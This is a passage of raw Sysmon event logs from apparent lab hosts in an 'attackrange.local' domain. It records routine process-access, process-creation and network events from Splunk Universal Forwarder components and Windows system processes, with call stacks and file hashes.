Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245802Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.646{CB4067E1-51E1-6063-B222-00000000AF01}380C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245801Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:21.099{CB4067E1-51E0-6063-B122-00000000AF01}36083412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000001061100Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:29:19.934{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54804-false10.0.1.12-8000- 10341000x8000000000000000245844Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.958{CB4067E1-51E2-6063-B422-00000000AF01}10841160C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245843Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51E2-6063-B422-00000000AF01}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245842Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245841Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245840Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245839Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245838Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245837Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245836Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245835Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245834Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245833Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-304A-6062-0500-00000000AF01}392408C:\Windows\system32\csrss.exe{CB4067E1-51E2-6063-B422-00000000AF01}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000245832Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-30AF-6062-9800-00000000AF01}26721992C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB4067E1-51E2-6063-B422-00000000AF01}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000245831Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.849{CB4067E1-51E2-6063-B422-00000000AF01}1084C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{CB4067E1-304A-6062-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000245830Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.286{CB4067E1-51E2-6063-B322-00000000AF01}4762308C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{CB4067E1-30AF-6062-9800-00000000AF01}2672C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245829Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-30AF-6062-9C00-00000000AF01}37363764C:\Windows\system32\conhost.exe{CB4067E1-51E2-6063-B322-00000000AF01}476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245828Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245827Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245826Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245825Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245824Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245823Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245822Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245821Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:29:22.177{CB4067E1-304B-6062-0C00-00000000AF01}7123440C:\Windows\system32\svchost.exe{CB4067E1-304C-6062-1F00-00000000AF01}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000245820Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 